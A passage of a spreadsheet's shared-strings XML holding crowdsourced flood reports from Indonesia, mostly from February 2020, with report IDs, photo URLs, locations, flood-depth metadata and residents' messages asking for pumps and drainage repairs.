    <t>e96ce3f3-126b-45bf-a28c-96e2f33d1650</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e96ce3f3-126b-45bf-a28c-96e2f33d1650.jpg</t>
  </si>
  <si>
    <t>Kampung gabus rt 01rw 02 desa srijaya kec. Tambun utara</t>
  </si>
  <si>
    <t>93bca7b8-c719-4a76-b31e-7c8ff4ae7be8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93bca7b8-c719-4a76-b31e-7c8ff4ae7be8.jpg</t>
  </si>
  <si>
    <t>3ea58ef5-3c0a-473e-920b-ff494ab5e981</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3ea58ef5-3c0a-473e-920b-ff494ab5e981.jpg</t>
  </si>
  <si>
    <t>Baru tahun ini, ngerasain banjir sampe segini.... Apakah gegara pembangunan ya?"</t>
  </si>
  <si>
    <t>Burangkeng</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lZXpPWwrhkJEc1_5sSJIBJi6eXvSdqoqZJF-7YLBLbv6fcNtsn-nxSyE_qRBEyiSCIqEU1i0LGqjJTqDo-ls0uIHwAiM=s480-c</t>
  </si>
  <si>
    <t>LOKASI : PERUMAHAN GADING GRIYA LESTARI RW 012, RT 001-011, KELURAHAN SUKAPURA, KEC.CILINCING, SLALU BUTUH LEBIH DARI 24 JAM UNTUK BISA SURUT. PADAHAL UDA TIDAK HUJAN. MUNGKIN ADA SALURAN PEMBUANGAN YG TERSUMBAT OLEH SAMPAH. ATAU KIRIMKAN TEAM DAMKAR UNT</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Hl-roNvxmAzxUUQsYgiOG9HmXh14OE5gMeq879Sze1yw9bRrncPww-vLJHHv-iizwtYkz1BZ0iCF1N2S5ZvDOkQ60BV3=s480-c</t>
  </si>
  <si>
    <t>Banjir &amp; surutnya lama sekali, salu perlu waktu, lebih dari 24 jam. Lokasi : Komplek Gading Griya Lestari RT 001-011, RW 012. Kelurahan Sujapura, Kec.Cilincing. Mohon bantuan pemeriksaan dan solusi. Makasih.</t>
  </si>
  <si>
    <t>4a033c09-6ad1-405e-89d4-08fdd32930fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4a033c09-6ad1-405e-89d4-08fdd32930fc.jpg</t>
  </si>
  <si>
    <t>Bakti Jaya</t>
  </si>
  <si>
    <t>faefa7d3-e85c-450b-83bc-71f2fe3222dc</t>
  </si>
  <si>
    <t>Dari jam 6 sore 25 feb s.d jam 5 pagi 26 feb posisi air sama = tidak di pompa. Mohon bantuannya.</t>
  </si>
  <si>
    <t>4ebae252-226a-4eaa-acea-4470dc931a3e</t>
  </si>
  <si>
    <t>Banjir di sungai</t>
  </si>
  <si>
    <t>5bb6b2d7-285c-46af-a596-e1e493bc556b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5bb6b2d7-285c-46af-a596-e1e493bc556b.jpg</t>
  </si>
  <si>
    <t>Masih banjir juga &amp; listrik padam.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/HXECYbq4fzWRIv9xTgzFgbVrwaT7SxCd5QPGPYnR18KcecGEstYRcUYXpDtIofmAfHtSSmI7bKqARPfgKqAWj880UzDa=s480-c</t>
  </si>
  <si>
    <t>sekedar info aja pak/Bu ini sudah 24 jam terendam air hujan kemarin. terimakasih. ketinggian sekarang tinggal 8-10 cm. semoga hari ini kering dan bersih kembali. aamiin</t>
  </si>
  <si>
    <t>8c519d8e-ce52-47ec-8294-c32789d9f39f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c519d8e-ce52-47ec-8294-c32789d9f39f.jpg</t>
  </si>
  <si>
    <t>deffe336-9c1f-497e-a7d1-ce48e0aba6bf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/deffe336-9c1f-497e-a7d1-ce48e0aba6bf.jpg</t>
  </si>
  <si>
    <t>Perum Bekasi Jaya Indah, Bekasi Timur. Pagi ini 26/2/2020 sudah mulai surut</t>
  </si>
  <si>
    <t>33b13a08-321d-4196-a050-b30b42646656</t>
  </si>
  <si>
    <t>https://images.petabencana.id/33b13a08-321d-4196-a050-b30b42646656.jpg</t>
  </si>
  <si>
    <t>Banjir belum bisa dilewati kendaraan bermotor. Listrik padam. Air tdk mengalir dan lambat surut</t>
  </si>
  <si>
    <t>8f2f17b2-e2c7-491a-a7dc-0bfcf107b58a</t>
  </si>
  <si>
    <t>Banjir di Taman Cibodas</t>
  </si>
  <si>
    <t>1e4fcabe-9f18-46d4-ba50-cc7b5a6590d4</t>
  </si>
  <si>
    <t>Dhi banjir</t>
  </si>
  <si>
    <t>09dcf3cd-417e-4dcc-baa6-a3625a4cfe8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09dcf3cd-417e-4dcc-baa6-a3625a4cfe8c.jpg</t>
  </si>
  <si>
    <t>b0e28a4f-ddac-4d4c-8e27-e3e26bacaf82</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b0e28a4f-ddac-4d4c-8e27-e3e26bacaf82.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/KoWdK3ZQz85UomO2BklVt22cvFqK-pXWMaD3sDiOEVzDeNhT8U1IBUIUmVwngRi2yWdDL7ZxUHHR916OOmh5Gw3Z6XSdPw=s480-c</t>
  </si>
  <si>
    <t>turap sungai ambrol terkena banjir</t>
  </si>
  <si>
    <t>06592f1c-7bc5-424c-8cd9-a1fd8c438cf2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06592f1c-7bc5-424c-8cd9-a1fd8c438cf2.jpg</t>
  </si>
  <si>
    <t>Rumah</t>
  </si>
  <si>
    <t>6c06183f-3685-49d6-ae86-cddaa3739678</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6c06183f-3685-49d6-ae86-cddaa3739678.jpg</t>
  </si>
  <si>
    <t>295c26d5-55a7-4437-b72c-5b7df2b12db2</t>
  </si>
  <si>
    <t>Sisa banjir semalam</t>
  </si>
  <si>
    <t>308efc8a-4b4f-4c3a-a632-1b0342315c7e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/308efc8a-4b4f-4c3a-a632-1b0342315c7e.jpg</t>
  </si>
  <si>
    <t>Belum surut depan taman sungai indragiri</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8aNX9gbDr7aq9fuKD-_YYASrcgZ0aLULdbxpR3teApDjpnb4fVDHDcqwQb-THIb0HLd4J-FuYQOeBkQi16_3DmXTod4=s480-c</t>
  </si>
  <si>
    <t>{ "points": 3 }</t>
  </si>
  <si>
    <t>mohon bantuanya tim ppsu membersihkam saluran got2 bekas banjir kemarin banyak lumpur &amp; sampah mendem di  jalan tumpi 1 dan tumpi raya. daerah tiap ujan banjir yang belum ada solusi berarti minimal tindakan kecil dapat mengurangi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/hg1VA2FXyYWJwzbK_ys3DuTeN5xRBSykabxBhE1wyXeQAUmV5L20SeXX_oOM83EDu8A4RPfhLpnznqtg3aovB6U21vqv=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "202", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>aacae71c-9550-496f-b879-279157e23d85</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aacae71c-9550-496f-b879-279157e23d85.jpg</t>
  </si>
  <si>
    <t>Depan Funpark Perumahan Permata Tangerang sampai Giant Permata Tangerang msh banjir</t>
  </si>
  <si>
    <t>Kuta Jaya</t>
  </si>
  <si>
    <t>Pasarkemis</t>
  </si>
  <si>
    <t>859c6dc7-5f32-4050-a5ac-629057b2d7e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/859c6dc7-5f32-4050-a5ac-629057b2d7e1.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 73, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1696", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>6db512a8-1b01-46fd-8a2e-6e8724f00d31</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6db512a8-1b01-46fd-8a2e-6e8724f00d31.jpg</t>
  </si>
  <si>
    <t>097ef0c8-5bb4-49b2-82c7-fd1258a9864e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/097ef0c8-5bb4-49b2-82c7-fd1258a9864e.jpg</t>
  </si>
  <si>
    <t xml:space="preserve">Banjir kenangan </t>
  </si>
  <si>
    <t>Pabelan</t>
  </si>
  <si>
    <t>Kartasura</t>
  </si>
  <si>
    <t>Sukoharjo</t>
  </si>
  <si>
    <t>08160029-d273-4cfa-81e8-a3910daf3b06</t>
  </si>
  <si>
    <t>7f42aa42-d90f-4e8b-8c7b-9474630a7a93</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7f42aa42-d90f-4e8b-8c7b-9474630a7a93.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 36, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Jalan Kecapi perumahan Jatimulya MASIH banjir. Tidak separah yang kemarin</t>
  </si>
  <si>
    <t>26f11dc4-02ae-443b-98c7-27bdc1a6a05d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/26f11dc4-02ae-443b-98c7-27bdc1a6a05d.jpg</t>
  </si>
  <si>
    <t>{ "points": 4, "flood_depth": 115, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir sedada</t>
  </si>
  <si>
    <t>c04ce99a-7dbe-4aaf-b6ac-caeaac019e06</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c04ce99a-7dbe-4aaf-b6ac-caeaac019e06.jpg</t>
  </si>
  <si>
    <t>Banjir yang melanda dari 1 minggu yang lalu</t>
  </si>
  <si>
    <t>Kepatihan</t>
  </si>
  <si>
    <t>Wiradesa</t>
  </si>
  <si>
    <t>Pekalongan</t>
  </si>
  <si>
    <t>6425be1f-5368-4069-bb2f-a0fae48a11e2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6425be1f-5368-4069-bb2f-a0fae48a11e2.jpg</t>
  </si>
  <si>
    <t>Banjir di Perumahan Harapan Indah, Bekasi. Banjir tertinggi yang pernah ada.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/VolHD43IID7CuicdqUGLepc8FiKoyKgdR0eofYOsIGK-4EpFS8X8j5sDo-_5Y2wQZu1gaQwh-a1Ryc4dLb8riY-NWFaL=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap Tolong benahi drainase &amp; tali2 air</t>
  </si>
  <si>
    <t>8f2e1515-933e-48e5-86f7-18c4a1a9f36f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f2e1515-933e-48e5-86f7-18c4a1a9f36f.jpg</t>
  </si>
  <si>
    <t>TELUK GONG POMPA GAK DI NYALAIN APA ?! Perasaan tempat lain surut kenapa disini gak surut- pompa ada tapi sengaja gak dinyalain ya"</t>
  </si>
  <si>
    <t>c02f02ec-26fa-4e35-9810-baccdd421e8c</t>
  </si>
  <si>
    <t>banjir yg memutus jembatan desa muara &amp; tanjungtiga</t>
  </si>
  <si>
    <t>Tanjungtiga</t>
  </si>
  <si>
    <t>Blanakan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Bpg4c3eXnDUM8Q_4IE4ln26XzODimw4U-6SUJsD7cos8MK3p7W_JDQ6Ycm5zzkdrCWeZuteUoNPicd85zOTuKK8xQDc=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2076", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKiriman #KaliMeluap mohon TL</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/m4j3BWK38Ls0aQP66EweMO_aPxM7F6Kg-6Ywda7hCtI0QX7CafwVcH1pstmaZEL5wsEk00Eti6g33tYdveFAxflttqWV=s480-c</t>
  </si>
  <si>
    <t>Bapak Lurah Teluk Gong, kenapa sampai skrg masih banjir tinggi. Saya cek gak ada pompa yg dinyalakan. iki piyee"</t>
  </si>
  <si>
    <t>8465ed08-e37e-46e1-975d-89b5f9cefb31</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8465ed08-e37e-46e1-975d-89b5f9cefb31.jpg</t>
  </si>
  <si>
    <t>{ "points": 6, "flood_depth": 50, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Airnya lama surut. Sepertinya pompa air tidak berjalan. Kasian kita yang masih harus beraktivitas.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349682</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/26/1582702184514711167.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1011", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sempat Terendam, Kawasan Kemang Sudah Bisa Dilalui Kendaraan</t>
  </si>
  <si>
    <t>Sempat terendam genangan air kemarin imbas hujan deras yang mengguyur Jakarta dan sekitarnya. Saat ini kawasan Kemang sudah bisa dilalui kendaraan. Kondisi jalan di Kemang saat ini kering, tidak ada lagi genangan air namun cuaca mulai mendung, diperkirak</t>
  </si>
  <si>
    <t>91678112-fb12-4397-b50e-07c919059242</t>
  </si>
  <si>
    <t>https://images.petabencana.id/91678112-fb12-4397-b50e-07c919059242.jpg</t>
  </si>
  <si>
    <t>Banjir Selasa, 25 Februari 2020 pd pukul 13:30 WIB</t>
  </si>
  <si>
    <t>abebccd8-3a1e-4107-aa23-8a7f3a160d94</t>
  </si>
  <si>
    <t>https://images.petabencana.id/abebccd8-3a1e-4107-aa23-8a7f3a160d94.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 18, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Genangan Air Cukup Bikin macet</t>
  </si>
  <si>
    <t>4fc14623-d1c6-452f-a6b7-c96117e85f00</t>
  </si>
  <si>
    <t>Haloo. Apa kabar pompa air teluk gong. Sampai sekarang air lama sekali surutnya.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349684</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/26/1582705091621771200.jpg</t>
  </si>
  <si>
    <t>Underpass Kemayoran Banjir, Police Line Dipasang di Lokasi</t>
  </si>
  <si>
    <t>Hujan deras kemarin, Underpass Kemayoran Jakarta Pusat banjir. Saat ini police line dipasang untuk mengamankan warga yang ingin mendekat kawasan tersebut. Sekuriti juga berjaga di lokasi.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349687</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/26/349687-1582706606654774021.mov-03.jpg</t>
  </si>
  <si>
    <t>Flyover Kemayoran Terendam Banjir Arus Lalu Lintas Dialihkan</t>
  </si>
  <si>
    <t>Banjir yang merendam Flyover Kemayoran membuat arus lalu lintas dialihkan sementara. Menurut pedagang yang berada di lokasi, banjir terjadi malam hari. La Semalam banjirnya kira-kira jam 1an ini paling semeter. Listrik juga dimatiin tapi sekarang udah"</t>
  </si>
  <si>
    <t>2696879d-f0ba-44c0-9bbb-c029fb7decbc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2696879d-f0ba-44c0-9bbb-c029fb7decbc.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 126, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1853", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dengan ketinggian hingga sedada orang dewasa. Dengan kondisi seperti ini banyak anak bayi,balita yg sangat membutuhkan bantuan.</t>
  </si>
  <si>
    <t>39d595aa-b6eb-4097-9a78-67f17f8e5c47</t>
  </si>
  <si>
    <t>https://images.petabencana.id/39d595aa-b6eb-4097-9a78-67f17f8e5c47.jpg</t>
  </si>
  <si>
    <t>Garden city RW.015 Kel.Periuk, Kec. Periuk, Kota Tangerang, Hari ke -4 malam ke-5 terendam banjir .. butuh pembuatan tanggul</t>
  </si>
  <si>
    <t>68725ab1-db15-4383-bd96-d7c49d71bc9a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68725ab1-db15-4383-bd96-d7c49d71bc9a.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 50, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1471", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Dalam 2 bulan sudah 4 x banjir Padahal sebelum sebelumnya jarang"</t>
  </si>
  <si>
    <t>5f040d1c-cc46-46ed-853b-8461749a0302</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5f040d1c-cc46-46ed-853b-8461749a0302.jpg</t>
  </si>
  <si>
    <t>ketinggian air di jalan depan rumah hampir mencapai 30cm. Jl. Teluk kumai timur  kel.perak utara  kec.pabean cantikan surabaya jawa timur"</t>
  </si>
  <si>
    <t>Perak Utara</t>
  </si>
  <si>
    <t>Pabean Cantian</t>
  </si>
  <si>
    <t>37bd112d-c70a-4e59-8f0e-8d33b897c87d</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1337", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air menggenang</t>
  </si>
  <si>
    <t>cadd1bc2-01a2-491f-817a-d760a519f772</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cadd1bc2-01a2-491f-817a-d760a519f772.jpg</t>
  </si>
  <si>
    <t>pes 2020</t>
  </si>
  <si>
    <t>Cawas</t>
  </si>
  <si>
    <t>Klaten</t>
  </si>
  <si>
    <t>31abbdc0-3e2d-42b6-8307-1011c5f3ffaf</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 2 }</t>
  </si>
  <si>
    <t>Masih aman</t>
  </si>
  <si>
    <t>Majangtengah</t>
  </si>
  <si>
    <t>Dampit</t>
  </si>
  <si>
    <t>Malang</t>
  </si>
  <si>
    <t>f873dda3-493b-4d95-bf75-3cd1d7e37996</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f873dda3-493b-4d95-bf75-3cd1d7e37996.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 41, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1257", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Dimatraman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/I-sHNfSWq1f8wRECMQW_ILmtRC__tWTTk3XniZz6RfcGoIzYqZ5vRmESGUIWbgROlzvj3H5QqfoJDqbey2yKO0B3oV5r=s480-c</t>
  </si>
  <si>
    <t>tolong di pompa donk , banjir sudah 3 hari tidak surut surut padahal kali sudah normal</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/10SyErgAtVBMjx6W2vAVCoHTRWHcaQ0m6NvE6gDDTJof8l4crU7n5EVAc2f43-u45UlssBUjxgQP6Fu7iGClntJxO9u5=s480-c</t>
  </si>
  <si>
    <t>Tolong pak ini banjir belum surut surut. Tolong TL pak.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/XtVK8iqVg8QecdeJemWsaAmAFSdbNV29iAMMJiICPsa4_SRXEFLn0WxhuFNUKB_F-42L5mX80rGPTOCpTOEnveQA2zE=s480-c</t>
  </si>
  <si>
    <t>tolong donk di tindak lanjuti masalah banjir teluk gong ini,karena posisi kali sudah normal, mesin pompa seperti tidak di gunakan, posisi kelurahan pejagalan"</t>
  </si>
  <si>
    <t>b5737576-de33-4ea4-a6b1-c0464a6acbfa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b5737576-de33-4ea4-a6b1-c0464a6acbfa.jpg</t>
  </si>
  <si>
    <t>Air banjir belum surut sejak senin, 24 Feb 2020 sampai 27 Feb 2020</t>
  </si>
  <si>
    <t>Kramatsari</t>
  </si>
  <si>
    <t>Pekalongan Barat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/r9YkoqXb3w8epQW17mWIwLDW8nkFVbty8YCacxR7BpBMEISKmpYX7uLUSBLRNidivhmeUamKPG7gKj89daiJFJ38HSM=s480-c</t>
  </si>
  <si>
    <t>Tolong pak banjir tidak surut surut sampai berlumut. sampai kapan ini surutnya pak.tks</t>
  </si>
  <si>
    <t>4b68ddeb-d4c2-43c4-aae2-caa641136bb5</t>
  </si>
  <si>
    <t>Tomang banjir</t>
  </si>
  <si>
    <t>a7aa6266-8b66-4477-a2bc-0d62729b679f</t>
  </si>
  <si>
    <t>ciledug</t>
  </si>
  <si>
    <t>Danauindah</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/qtyxkgCXrMeiJcjyenIVtZoRLXBx89DY1hwyEfgerJhn2sAUC-g7DYt0cRyaeZdlvAmBGY4jHVfyWJEqxxzLsnIqIYQ=s480-c</t>
  </si>
  <si>
    <t>{ "points": 6 }</t>
  </si>
  <si>
    <t>udh 2 hari blom surut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/C8GngrOSVeLlIL1e1NjIl6-84LBzMY2hAOEcYP05_KHDTUPOnNSY9W8YJ0Ef_bJO3e5e2VE8kWjmmLs2znDeg-BJXjSf=s480-c</t>
  </si>
  <si>
    <t>katanya sedangkan di kerjakan tapi sampai saat ini masih dalem banjir nya,tolong segera di tindaklanjuti lanjuti, teluk gong dalam turunan teluk intan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/9Kc2aZqnOTQl3vOw-EMpp3grFLZIbOmYW6YMBT6lH9hRZu2vRDNRkutDaaWKhSVgJMO0MSlpW3B16rCDn73sJG2vR5d7=s480-c</t>
  </si>
  <si>
    <t>tolong segera di pompa donk, udah 3 hari gini gini aja,padahal daerah lain sudah surut, masa mesin rusak Mulu, mohon segera di tindaklanjuti</t>
  </si>
  <si>
    <t>04ed5bbc-2275-4b1c-b9e8-39d09eb596e0</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 136 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1910", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>daerah banjir meliputi RW 07 dari RT 3-9 dan sebagian wilayah RW 05 Kelurahan Makasar Jakarta Timur</t>
  </si>
  <si>
    <t>ef72a8dd-0f8b-41f5-b2e8-39890a839fc5</t>
  </si>
  <si>
    <t>gang anggrek deket selokan kecil yang hampir selalu kebanjiran terlepas hujan kecil atau deras</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/0xlxIi2RG2n-iUqAzi7oYYvAkDNqeEtS7teDrryGxxnGFroFOBGqamxtG1MYqmWcyS-ucoiB8jloFdUcMC6PeH2PjkI=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil  Tolong untuk Jakut khususnya Tj priuk agar di perhatikan fasilitas agar tidak Banjir masuk sampe krumah air nya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/qti6DaW-BNR9MT4wQD-alRh48_N_wHtw7LuFc6IGwLbRso8Yisyksz6fmsWbomxdMxmSo2bMMa82BlwUTHggOhQ2-1wA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "604", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>lokasinya di belokan jalan masjid Akbar pasca banjir ini kok pada numpuk yah sisa sampah banjir nya mohon di follow up dan dibersihkan segera. Regards."</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/UaFR5duMP8fI_zB_iUgmptuqjj8CdEZqcpmsRI6-8MwoYz9wMox6r0DEZHvDtgORPhiNHvuRPzDiAuDYpGm7iobLKQ=s480-c</t>
  </si>
  <si>
    <t>Tolong untuk Dinas terkait segera atasi banjir di wilayah Teluk Gong sudah hampir 4 haru masih belum surut masa tiap banjir pompa selalu beralasan rusak. tolong segera diatasi!"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/wapyvn4Sc_HTMfmQp5HNksMdz0LsSSoHK9qjMPmpvhg2GlpTXBO8TIs2ITKkGtmcg4Xlr-OpEGE-0c9ta3SRuf5HoBIj=s480-c</t>
  </si>
  <si>
    <t>JALAN DI DEPAN RT. 003/7 ADA GENANGAN AIR GAK PERNA SURUT...BELUM ADA PENANGAN YANG SERIUS...</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Lz6idsZEKHFbQNdwT2bTdEZfERS9N7xnGjOTLPGlfGu1HTenML5W8FtEcjD4Fo_GVmmUsOL9eOJVlHurgg61eALO1JHAkg=s480-c</t>
  </si>
  <si>
    <t>menyumbat saluran air</t>
  </si>
  <si>
    <t>d38485d4-9e35-449a-ba71-5ae5f365e34d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d38485d4-9e35-449a-ba71-5ae5f365e34d.jpg</t>
  </si>
  <si>
    <t>Banjir belum ada perkembangan dari Kelurahan/kecamatan Cipayung. Belum ada Tindak Lanjutan hanya sebatas minta Fc.KK tidak ada kelanjutan.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/qHuQcm1BUvUFY0MwEDNfvYDy2UtI-vsFGzM0ufKAg_xm3IvpF1O6nnbckkvaTAxfUexYysljD7Qiyxk7Xo9fZOp-3sU=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirKiriman Tolong di minimalisir</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349798</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/28/15828819731644983872.jpg</t>
  </si>
  <si>
    <t>Sungai Cikeruh Mulai Meluap, Warga Diharap Waspada Banjir</t>
  </si>
  <si>
    <t>Sore ini sungai Cikeruh di wilayah RW 09 Desa Cikeruh Jatinangor Sumedang, Jumat, (28/02/2020) sudah mulai meluap. Hal ini disebabkan curah hujan yang tinggi di wilayah Tanjungsari. Mohon tetap waspada kepada warga yang berada di bantaran sungai.</t>
  </si>
  <si>
    <t>Jatimukti</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349800</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/28/349800-1582882718152930730.mp4-03.jpg</t>
  </si>
  <si>
    <t>Sungai Cikeruh Meluap, Akses Jalan pun Terputus</t>
  </si>
  <si>
    <t>Suasana terkini Sungai Cikeruh, Jumat, (28/02/2020) sore pukul 16.35 WIB. Air terus meluap, mohon waspada.</t>
  </si>
  <si>
    <t>5c99b96f-6278-4c71-9cb5-b02c799281a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5c99b96f-6278-4c71-9cb5-b02c799281a0.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 124 }</t>
  </si>
  <si>
    <t>d202608b-8972-4e9e-a691-9a236718c364</t>
  </si>
  <si>
    <t>Banjir krn sungai meluap</t>
  </si>
  <si>
    <t>Kandangan</t>
  </si>
  <si>
    <t>Benowo</t>
  </si>
  <si>
    <t>0a916105-6e60-4809-8d62-643066afb0e7</t>
  </si>
  <si>
    <t>4b25708e-5668-4708-bffe-13ad8924ac46</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b25708e-5668-4708-bffe-13ad8924ac46.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/_SXOIL0ZLIZjOdHnHffMZ_fSXoB0mV1yfspxoa_m8qquzV6_fys_2ZeIOLgbmNhD2sw7AMUMPAOtVTdP_gLdHk5vsKtq=s480-c</t>
  </si>
  <si>
    <t>Warga Cipinang Melayu RT01 RW 04 kembali kebanjiran ketinggian diperkirakan sepaha orang dewasa. Mohon bantuannya agar air dapat surut kembali   #KaliMeluap #BanjirKiriman #hujan lokal intensitas tinggi</t>
  </si>
  <si>
    <t>4988dce5-5367-4050-a48b-c49a4defc15c</t>
  </si>
  <si>
    <t>Banjir akibat meluapnya sungai cikeruh di sayang Jatinangor Sumedang s.d ke kawasan Rancaekek kab. Bandung</t>
  </si>
  <si>
    <t>Sayang</t>
  </si>
  <si>
    <t>4baafcc4-326b-4e3e-b582-c5ccb2c181ac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4baafcc4-326b-4e3e-b582-c5ccb2c181ac.jpg</t>
  </si>
  <si>
    <t>Rel di stasiun rancaekek tergenang</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349815</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/28/349815-15829066101815771339.mp4-03.jpg</t>
  </si>
  <si>
    <t>Truk Damkar Dikerahkan Bantu Warga Korban Banjir Jatinangor</t>
  </si>
  <si>
    <t>Satu unit damkar tiba di RW 09 Cikeruh Kecamatan Jatinangor Sumedang, Jumat, (28/02/2020) malam. Damkar ini membantu warga untuk membersihkan rumah yang terendam banjir dan menyisakan lumpur.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vHoEaai2mw52gyo3mAhBpNqXE2Un2d64dNyb9mDktQmQeq9sB557zkHFkMxt9C_aMwnFcHlwprYULnSPphoU7rrb32o=s480-c</t>
  </si>
  <si>
    <t>Laporan ke 3 via QLUE masih blm direspon #Sudin #PakLurah #InstansiTerkait..Tolong diperbaiki,lubang bertambah lebar dan berbahaya....</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vKl1IRwLwPSdaQlwX4hIiPIEgZIFnSa1gw5B14lISbI0BviIvwB4rVC6CZeyGk5hJXrEqzXuJ1nnejMWaxVKIKwgXQR8=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "119", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
